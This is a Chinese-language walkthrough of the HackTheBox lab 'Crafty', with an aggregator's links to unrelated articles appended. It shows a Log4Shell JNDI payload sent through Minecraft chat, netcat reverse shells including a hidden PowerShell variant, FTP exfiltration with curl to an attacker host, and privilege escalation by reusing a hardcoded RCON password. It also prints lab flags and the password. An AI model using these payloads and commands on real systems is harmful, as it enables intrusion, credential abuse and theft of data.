[Meachines][Easy]Crafty

Main

$ sudo nmap -p- -sS -T4 10.10.11.249

发现25565端口是我的世界服务器端口

image.png

  • CVE-2021-44228:
    https://nodecraft.com/blog/service-updates/minecraft-java-edition-security-vulnerability
  • 在阿帕奇Log4j图书馆,广泛使用的记录框架,在Java应用程序。 这个漏洞,也称为Log4Shell,允许攻击者执行恶意代码的远程通过利用一个缺陷在图书馆的JNDI(Java命名和目录口)查询机制。

# echo "10.10.11.249 crafty.htb">>/etc/hosts

修改本地hosts文件解析地址

image.png

$ git clone https://github.com/kozmer/log4j-shell-poc

$ cd log4j-shell-poc

# vim log4j-shell-poc

修改/bin/bash为cmd.exe

image.png

(log4j-shell-poc)$ wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz

下载java环境,在log4j-shell-poc目录中

(log4j-shell-poc)$ tar -zxf jdk-8u181-linux-x64.tar.gz

(log4j-shell-poc)$ mv jdk1.8.0_181 jdk1.8.0_20

下载我的世界启动器 https://tlauncher.org/jar

$ wget -O TLauncher-2.899.zip https://tlauncher.org/jar

$ unzip TLauncher-2.899.zip

$ java -jar TLauncher-2.899.jar

选择版本1.16.5进行下载

image.png

选择多人游戏

image.png

手动添加服务器或者等待一会也能扫出来

image.png

image.png

$ python3 poc.py --userip 10.10.16.23 --webport 8200 --lport 10032

image.png

$ nc -lvnp 10032

进入游戏中,按t输入payload

${jndi:ldap://10.10.16.23:1389/a}

image.png

image.png

image.png

User Flag

>dir C:\Users\svc_minecraft\Desktop

>type C:\Users\svc_minecraft\Desktop\user.txt

image.png

fa3ee28076b9040712a643b7f1c0b67e

Root Flag

发现一个jar包,plugins/playercounter-1.0-SNAPSHOT.jar包

image.png

image.png

很明显我们不能在IIS默认目录下写文件,也就意味着这个jar包只能用其他方式下载

>curl

image.png

可以看到有curl命令,我们使用curl+ftp进行文件上传与下载

image.png

在kali中创建临时的FTP服务

$ pip3 install pyftpdlib
$ mkdir ftp_temp;cd ftp_temp
(ftp_temp)$ python3 -m pyftpdlib -w -u martin -P martin -p 21

image.png

  • 本主机文件上传至FTP服务器

$ curl -T <File.xxx> -u martin:martin ftp://10.10.16.23/

  • 从FTP服务器将文件下载至本主机

$ curl -O -u martin:martin ftp://10.10.16.23/file.txt

接下来将plugins/playercounter-1.0-SNAPSHOT.jar上传至kali主机

> curl -T c:\users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar -u martin:martin ftp://10.10.16.23/

image.png

image.png

$ sudo apt install jd-gui

下载jd-gui分析jar包

$ jd-gui 启动

image.png

这是一个统计玩家在线的插件程序,在这段程序中,s67u84zKq8IXw 是用于 RCON(远程控制)连接的密码。RCON 是一种远程服务器控制协议,通常用于管理游戏服务器,特别是 Minecraft 服务器。

在 Minecraft 服务器中启用 RCON 后,需要提供一个密码以允许远程管理服务器。这个密码是在 Minecraft 服务器的配置文件中设置的。当你使用 Rcon 连接到服务器时,需要提供这个密码来验证你的身份,以便执行管理操作,例如发送命令给服务器。

Tools

  • WinPEAS:WinPEAS 脚本会自动收集系统信息,并执行一系列检查,以查找常见的安全漏洞和潜在的特权升级路径。它可以检查诸如文件权限、服务配置、定时任务、安装程序和服务等方面的问题,并生成详细的报告,帮助用户识别潜在的安全威胁和漏洞(https://github.com/peass-ng/PEASS-ng/releases/tag/20240414-ed0a5fac)

  • Seatbelt:Seatbelt是一款由 SpecterOps 开发的用于 Windows 主机安全审计和特权升级的工具。它旨在帮助渗透测试人员、红队成员和安全研究人员识别和利用 Windows 系统上的潜在安全漏洞和特权升级路径。(https://github.com/r3motecontrol/Ghostpack-CompiledBinaries)

  • jaws-enum:jaws-enum 脚本使用 PowerShell 编写,通过执行一系列 PowerShell 命令和技巧来收集信息和检查系统配置。它能够在 Windows 主机上运行,并且可以作为渗透测试、红队行动和安全审计中的一部分来帮助用户识别潜在的安全风险和漏洞。(https://github.com/411Hall/JAWS)

Manually elevate privileges using local credentials

>cmdkey /list

  • 列出当前计算机上存储的凭据信息。凭据信息通常是用户登录凭据、网络共享凭据等,可以用于自动登录网络共享、远程服务器等场景

image.png

这种命令就必须要看管理员是否有密码了
>runas /env /noprofile /savecred /user:JUGG-efrost\administrator "cmd.exe /c whoami > whoami.txt"
将里面换成反向shell命令即可
image.png

>runas /env /noprofile /savecred /user:administrator ".\nc64.exe 192.168.8.107 10033 -e cmd.exe"

image.png

我们可以很清楚看到有一个反向shell的cmd命令窗口,这样容易被人为关闭进程,我们可以通过powershell来隐藏窗口

runas /env /noprofile /savecred /user:administrator "powershell.exe -w hidden -c .\nc64.exe 192.168.8.107 10033 -e cmd.exe"

由于这些都是只能在GUI界面进行提权,得考虑如何从反向shell界面进行提权

所以采用powershell-ep绕过从我们目前的shell

> $secpasswd = ConvertTo-SecureString "s67u84zKq8IXw" -AsPlainText -Force

> $mycreds = New-Object System.Management.Automation.PSCredential ("Administrator", $secpasswd)

> Start-Process -FilePath powershell.exe -argumentlist ".\nc64.exe 10.10.16.23 10032 -e cmd.exe" -Credential $mycreds

逐步分析

  • s67u84zKq8IXw被(AsPlainText)指定为明文将作为安全字符串保存,并且忽略安全问题(安全字符串(SecureString)是一种在 PowerShell 中用于存储敏感信息的数据类型。与普通字符串不同,安全字符串以加密方式存储在内存中,并且在使用完毕后会立即被清除,以增强数据的安全性)
  • System.Management.Automation.PSCredential使用指定的用户名和密码创建一个凭据对象 $mycreds,以便在 PowerShell 脚本中使用该凭据对象来执行需要认证的操作,比如远程连接、启动进程等。
  • Start-Process使用 PowerShell 启动一个新的进程,以执行 powershell.exe 命令,并传递了参数 -argumentlist 来指定要执行的命令。具体来说,命令是 .\nc64.exe 10.10.16.23 10032 -e cmd.exe

回到题目中

在kali先将反向shell的powershell脚本保存至临时ftp目录

$ vim reverse.ps1

$ python3 -m pyftpdlib -w -u martin -P martin -p 21

image.png

切换到临时目录,并且进行文件下载

> cd ..\AppData\Local\Temp

> curl -O -u martin:martin ftp://10.10.16.23/reverse.ps1

image.png

我们将当前终端进入powershell

image.png

ps> $secpasswd = ConvertTo-SecureString "s67u84zKq8IXw" -AsPlainText -Force

ps> $mycreds = New-Object System.Management.Automation.PSCredential ("Administrator", $secpasswd)

ps> Start-Process -FilePath powershell.exe -argumentlist ".\reverse.ps1" -Credential $mycreds

image.png

成功提权

image.png

image.png

499d7b2f787007256ecb549acaa96c25

彩蛋

没事干做了一个八段数码管

在这里插入图片描述
在这里插入图片描述

整体思路用命令方块填充坐标,在写入数据缓冲区中控制了每一个段的地址.
用户将数据写入数据缓冲区时,会二次将数据近些写入数据缓存区,让数码管点亮,在清除缓冲区中主要起到一个清除标志位的作用,用来擦除两个数据缓冲区的内容

在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/561448.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

一起Talk Android吧(第五百五十七回:如何获取文件读写权限)

文章目录 1. 概念介绍2. 使用方法3. 示例代码4. 内容总结各位看官们大家好,上一回中分享了一个Retrofit使用错误的案例,本章回中将介绍 如何获取文件读写权限。闲话休提,言归正转,让我们一起Talk Android吧! 1. 概念介绍 我们在本章回中说的文本读写权限是指读写手机中的…

0-1背包问题:贪心算法与动态规划的比较

0-1背包问题&#xff1a;贪心算法与动态规划的比较 1. 问题描述2. 贪心算法2.1 贪心策略2.2 伪代码 3. 动态规划3.1 动态规划策略3.2 伪代码 4. C语言实现5. 算法分析6. 结论7. 参考文献 1. 问题描述 0-1背包问题是组合优化中的一个经典问题。假设有一个小偷在抢劫时发现了n个…

CCF-CSP真题《202312-3 树上搜索》思路+c++满分题解

想查看其他题的真题及题解的同学可以前往查看&#xff1a;CCF-CSP真题附题解大全 问题描述 试题编号&#xff1a;202312-3试题名称&#xff1a;树上搜索时间限制&#xff1a;1.0s内存限制&#xff1a;512.0MB问题描述&#xff1a; 题目背景 问题描述 输入格式 输出格式 样…

BioTech - 使用 Amber 工具 松弛(Relaxation) 蛋白质三维结构 (Python)

欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/137889532 Amber 工具在蛋白质 松弛(Relaxation) 过程中起着重要的作用。在分子动力学模拟中,蛋白质松弛是指模拟过程中蛋白质结构达到一个较为稳定的状态。这个过程通…

SQLite轻量级会话扩展(三十四)

返回&#xff1a;SQLite—系列文章目录 上一篇&#xff1a;SQLite R*Tree 模块&#xff08;三十三&#xff09; 下一篇&#xff1a;SQLite—系列文章目录 1. 引言 会话扩展提供了一种方便记录的机制 对 SQLite 数据库中某些表的部分或全部更改&#xff0c;以及 将这些…

视频质量评价 SSIM 算法详细介绍

SSIM SSIM(Structural Similarity Index Measure)是一种用于衡量两幅图像之间相似度的指标,是属于全参考视频质量评价算法范畴;它在图像质量评估领域得到了广泛的应用。SSIM是基于人类视觉系统的特性设计的,它考虑了图像的亮度、对比度和结构信息。SSIM的值范围在-1到1之…

xilinx 7系列FPGA时钟布线资源

7系列FPGA拥有多种时钟路由资源&#xff0c;以支持各种时钟方案和需求&#xff0c;包括高扇出、短传播延迟以及极低的偏斜。为了最佳地利用时钟路由资源&#xff0c;需要了解如何将用户时钟从PCB传递到FPGA&#xff0c;确定哪种时钟路由资源最优&#xff0c;然后通过利用适当的…

【数据结构|C语言版】单链表

前言1. 单链表的概念和结构1.1 单链表的概念1.2 单链表的结构 2. 单链表的分类3.单链表的实现3.1 新节点创建3.2 单链表头插3.3 单链表头删3.4 单链表尾插3.5 单链表尾删3.6 链表销毁 4. 代码总结4.1 SLT.h4.2 SLT.c4.3 test.c 后言 前言 各位小伙伴大家好&#xff01;时隔不久…

百科不全书之 docker记录

docker记录 1.参考文件2. Docker简介与虚拟机的区别 3. 安装Docker注意 Windows家庭版的要额外设置 4.使用5.docker与ROS 1.参考文件 参考视频&#xff1a;B站【GeekHour】Docker入门教程: 【GeekHour】30分钟Docker入门教程 2. Docker简介 Docker是一个用于构建运行 传送…

The C programming language (second edition,KR) exercise(CHAPTER 4)

E x c e r c i s e 4 − 1 Excercise\quad 4-1 Excercise4−1&#xff1a; #include <stdlib.h> #include <stdio.h> #include <string.h> int strindex(char s[],char t[]); int strrindex(char s[],char t[]);int main(void) {char s[100]"qwoulddf…

Java | Leetcode Java题解之第41题缺失的第一个正数

题目&#xff1a; 题解&#xff1a; class Solution {public int firstMissingPositive(int[] nums) {int n nums.length;for (int i 0; i < n; i) {while (nums[i] > 0 && nums[i] < n && nums[nums[i] - 1] ! nums[i]) {int temp nums[nums[i] …

yolov8实战第七天——pyqt5-yolov8实现车牌识别系统(参考论文(约7000字)+环境配置+完整部署代码+代码使用说明+训练好的模型)

基于 pyqt5-yolov8实现车牌识别系统,包括图片车牌识别,视频车牌识别,视频流车牌识别。 效果展示(图片检测,检测到的内容添加到历史记录): 效果展示(视频检测,视频车辆只会添加一条记录,下文更多实际应用中的优化策略): 基于YOLOv8和PyQt5的车牌识别系统设计与…

存储竞赛,角逐未来

随着人工智能&#xff08;AI&#xff09;和大数据驱动的海量数据需求&#xff0c;对存储技术的要求也在不断提高。在此背景下&#xff0c;各大存储芯片巨头之间的技术竞赛日益激烈。 在NAND闪存领域&#xff0c;企业关注的重点在于层数的突破。近日&#xff0c;《韩国经济日报》…

linux下编译c++程序报错“undefined reference to `std::allocator<char>::allocator()‘”

问题 linux下编译c程序报错“undefined reference to std::allocator::allocator()”。 原因 找不到c标准库文件。 解决办法 开始尝试给gcc指令添加-L和-l选项指定库路径和库文件名&#xff0c;但是一直不成功&#xff0c;后来把gcc改为g就可以了。

Stylus精讲:网页设计新境界【写作AI一键生成】

首先&#xff0c;这篇文章是基于笔尖AI写作进行文章创作的&#xff0c;喜欢的宝子&#xff0c;也可以去体验下&#xff0c;解放双手&#xff0c;上班直接摸鱼~ 按照惯例&#xff0c;先介绍下这款笔尖AI写作&#xff0c;宝子也可以直接下滑跳过看正文~ 笔尖Ai写作&#xff1a;…

SWCTF

easy_php 源码 <?php// flag is in flag.php highlight_file(__FILE__); ini_set(display_errors, 0); error_reporting(0);if (isset($_GET[myon1]) && isset($_GET[myon2]) && isset($_GET[myon3])) {$myon1 $_GET[myon1];$myon2 $_GET[myon2];$myon…

# Win10 打不开【本地组策略编辑器】解决方案

Win10 打不开【本地组策略编辑器】解决方案 段子手168 问题描述&#xff1a; 当在 WIN R 打开【运行】输入&#xff1a;gpedit.msc 打开【本地组策略编辑器】时&#xff0c;出现错误时&#xff0c; 或者在【计算机管理】中 没有【本地用户和组】这一项。 可以试一下以下方…

Go 之 sync.Mutex 加锁失效现象

我先声明一下&#xff0c;并不是真的加锁失效&#xff0c;而是我之前的理解有误&#xff0c;导致看起来像是加锁失效一样。于是乎记录一下&#xff0c;加深一下印象。 我之前有个理解误区&#xff08;不知道大家有没有&#xff0c;有的话赶紧纠正一下——其实也是因为我这块的…

Spec-Gaussian:3D高斯溅射的各向异性视图相关外观

Spec-Gaussian: Anisotropic View-Dependent Appearance for 3D Gaussian Splatting Spec-Gaussian&#xff1a;3D高斯溅射的各向异性视图相关外观 Ziyi Yang1,3  Xinyu Gao1  Yangtian Sun2  Yihua Huang2  Xiaoyang Lyu2 杨子怡 1,3 高新宇 1 太阳扬天 2 黄宜华 2 吕晓阳…

【github主页】优化简历

【github主页】优化简历 写在最前面一、新建秘密仓库二、插件卡片配置1、仓库状态统计2、Most used languages&#xff08;GitHub 常用语言统计&#xff09;使用细则 3、Visitor Badge&#xff08;GitHub 访客徽章&#xff09;4、社交统计5、打字特效6、省略展示小猫 &#x1f…